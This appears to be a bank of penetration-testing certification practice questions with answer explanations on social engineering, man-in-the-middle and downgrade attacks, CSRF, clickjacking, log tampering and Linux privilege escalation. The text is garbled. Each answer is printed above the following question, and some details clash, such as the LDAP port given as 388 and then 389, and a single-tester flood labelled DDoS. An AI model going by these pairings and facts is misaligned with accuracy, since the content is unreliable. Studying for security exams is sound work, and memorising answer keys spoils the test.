A penetration tester reviews social media accounts owned by the target organization's CIO and makes a list of possible passwords such as her spouse's name, pet's name, favorite sports teams, and so on. The tester tries to log on to the CIO's account using one possible password after another, trying to find one that works. What type of authentication exploit is this? A. Credential brute-forcing B. Session hijacking C. Redirect attack D. Password cracking
B. Tailgating Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This occurs with the authorized person's knowledge and/or consent. In this example, the authorized employee held the door open for the penetration tester.
A penetration tester waits in the target organization's parking lot early in the morning until she sees an employee heading toward the front door. She walks up behind the employee while clumsily carrying several large boxes. She asks the employee to hold the door for her and is able to enter the facility. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking Piggybacking occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
A penetration tester waits in the target organization's parking lot until she sees a large group of employees returning from lunch. She inserts herself quietly at the back of the group. The first person in the group uses his badge to unlock a secured door. The penetration tester is able to move through the door with the rest of the group. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
D. Man-in-the-middle A replay attack is also classified as a man-in-the-middle attack.
A replay attack is commonly categorized as which type of exploit? A. Denial of service (DoS) B. NAC bypass C. Distributed denial of service (DDoS) D. Man-in-the-middle
C. Implement an HTTP downgrade attack. A downgrade attack is a form of attack in which a tester forces a network channel to switch to a less secure or unprotected data transmission standard. Downgrading the protocol is one component of a man-in-the-middle type attack and is used to intercept encrypted traffic. Downgrade attacks work by causing the client and server to use a less-secure protocol. In this scenario, since you are trying to capture all unencrypted web traffic, you would want to implement an HTTP downgrade attack.
An evil twin has been successfully deployed by a penetration tester and is beginning to see some victim traffic. What would be the next step that the tester would want to take to capture all of the unencrypted web traffic from the victim? A. Harvest the user credentials to decrypt traffic. B. Implement a certification authority (CA) attack by impersonating trusted CAs. C. Implement an HTTP downgrade attack. D. Perform a man-in-the-middle attack.
B. Distributed denial of service (DDoS) By flooding the router with bogus ICMP traffic, the tester makes it difficult for the router to service legitimate network requests. Because multiple hosts were used to conduct the stress test, this is an example of standard distributed denial of service (DDoS) attack.
During a gray box penetration test, the tester decides to stress test a critical network router. She sends thousands of ping requests addressed to all of the hosts on the subnet. However, she spoofs the source address of the requests to the IP address of the network router. As a result, the router is flooded with ICMP echo response traffic that it didn't initiate, making it difficult for it to respond to legitimate network requests. What kind of exploit is this? A. Denial of service (DoS) B. Distributed denial of service (DDoS) C. Replay attack D. NAC bypass
C. Default account settings exploit The penetration tester in this scenario exploited the firewall administrator's failure to modify the default account settings on the firewall device. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These default account settings are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.
During a gray box penetration test, the tester discovers that one of the organization's firewalls has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the firewall and opens holes in it. What kind of authentication exploit occurred in this scenario? A. Weak credentials exploit B. Redirect attack C. Default account settings exploit D. Credential brute-forcing
A. Relay attack This is an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server.
During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester is able to modify the data in the packets and then send it on to the server. The tester's workstation poses as the client to the server. What kind of exploit is this? A. Relay attack B. DNS cache spoofing C. Pass the hash D. Replay attack
B. Cross-site request forgery (CSRF) This is an example of a cross-site request forgery (CSRF). Because the session cookie from the website was saved locally, the user is perpetually logged on to the site. Therefore, the HTTP request to change the user's password contained in the email message didn't require authentication to execute. The penetration tester can now log on to Active Directory as a high-level employee.
During a gray box penetration test, the tester notices that the organization's human resources self-service web application uses Active Directory user accounts for authentication. It also includes a "Remember me" option on the login page. The tester sends an email message to high-level employees within the organization with the subject line "Check out this funny picture." When the email is opened, hidden HTML code actually sends an HTTP request to the self-service web application that changes the user's password. The attack relies on the saved session cookie from the site to work. What type of authentication exploit is this? A. Cross-site scripting (XSS) B. Cross-site request forgery (CSRF) C. Clickjacking D. Credential brute forcing
A. ARP spoofing By sending fake ARP messages, the tester's workstation can fool client workstations into thinking it is the web server by associating the server's IP address with her workstation's MAC address. Likewise, the server can be fooled into thinking her workstation is the end user's workstation by doing the same thing, sending a fake ARP message to the server mapping the client's IP address to her workstation's MAC address.
During a gray box penetration test, the tester wants to implement a downgrade man-in-the-middle attack to reduce the security of web browser sessions from TLS to SSL. What exploit can the attacker use to trick client workstations into thinking her workstation is the web server and vice versa? A. ARP spoofing B. Replay attack C. Pass the Hash D. SYN attack
B. Recommend they use SSL-enabled LDAP on port 636. You should recommend they use LDAPS on port 636 to manage user accounts. LDAPS is secured with SSL. Standard LDAP on port 389 transmits data on the network as clear text. This means the administrative user credentials you submit to access the directory service itself as well as any credentials of the users being managed are transmitted as clear text.
During a penetration test, you discover that an administrator is using clear-text LDAP on port 388 to update user accounts in their LDAP-compliant directory service, including user credentials. What should you recommend the client do to fix this? A. Recommend they discontinue using LDAP clients to manage user accounts. B. Recommend they use SSL-enabled LDAP on port 636. C. Recommend they switch to a non-LDAP directory service. D. Recommend they use SSH-enabled LDAP on port 22.
A. A clickjacking attack Clickjacking is when a tester uses multiple transparent layers to trick a user into clicking a button or link on another page when they were intending to click the top-level page. The tester is "hijacking" clicks and routing them to another page. In web browsers, clickjacking is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user's knowledge, such as clicking a button that appears to perform another function.
During a web application penetration test, a penetration tester observes that the content security policy header is missing. What type of attack would the tester most likely perform next? A. A clickjacking attack B. A command injection attack C. A directory traversal attack D. A remote file inclusion attack
A. It is a server. NBTSTAT identifies NetBIOS servers with an ID of <20>. Based on this output, you know that DEV-1 is most likely a Windows server (or a Linux server running the Samba service).
During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows: Name Type Host Address Life [sec] ------------------------------------------------------------ DEV-1 <20> UNIQUE 10.0.0.3 517 What do you know about the DEV-1 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
B. It is a workstation. NBTSTAT identifies NetBIOS workstations with an ID of <00>. Based on this output, you know that PROD-9 is most likely a Windows workstation (or a Linux workstation running the Samba service).
During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows: Name Type Host Address Life [sec] ------------------------------------------------------------ PROD-9 <00> UNIQUE 10.0.0.132 517 What do you know about the PROD-9 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
A. Authority Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.
Several employees of an organization were recently victims of a phishing attack. They received an email that appeared to come from the company president. The email stated that the employees would receive disciplinary action if they did not do as the emailed instructed and click a link in the message. What principles of social engineering did the attacker use? A. Authority B. Fear C. Scarcity D. Social proof
C. Vishing Vishing (voice phishing) is social engineering over the phone system. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Vishing works like phishing but is carried out using voice technology. A vishing attack can be conducted by voice email, voice over IP (VoIP), or landline or cellular telephone. In this scenario, since the CEO is receiving telephone calls, this is a vishing attack.
The president of an organization reported that he has been receiving a number of phone calls from someone claiming to be with the help desk department. This individual is asking for the CEO to verify his network authentication credentials because his computer is broadcasting across the network. What type of attack is taking place? A. Impersonation B. Interrogation C. Vishing D. Whaling
C. Hide any files that you copied to the system. D. Alter log entries created when you compromised the system. In the process of covering your tracks, you should consider taking actions such as removing or hiding any files you copied to the system. You could also consider altering any log entries that were created when you compromised the system. However, there are two things to keep in mind when modifying log files. First, make sure the scope of work for the penetration test allows you to modify log files. Sometimes it will not be allowed. Second, you should not delete all the log entries. This would be a dead giveaway to a defender that you have compromised the system.
You are performing a gray box penetration test. You have successfully compromised a target computer system. You now need to cover your tracks to hide the evidence of your actions. Which techniques could you employ? (Choose two.) A. Create a text file in the administrator's home directory named Youvebeenhacked.txt. B. Delete all entries from all log files. C. Hide any files that you copied to the system. D. Alter log entries created when you compromised the system.
B. Assigning the SGID special permission C. Assigning the SUID special permission Assigning an executable on Linux the SUID permission allows it to run with the permissions of the file's owner. If the owner is the root user, then it will execute with root's superuser permissions. Likewise, assigning an executable the SGID permission allows it to run with the permissions of the owning group. If the owning group is the root group, then it runs with the root group's permissions.
You need to use privilege escalation on a Linux system during a penetration test. Which features of the operating system can be used to allow an executable to be run with superuser-level permissions? (Choose two.) A. Running it as administrator B. Assigning the SGID special permission C. Assigning the SUID special permission D. Running it from a child BASH shell session E. Assign the sticky bit permission
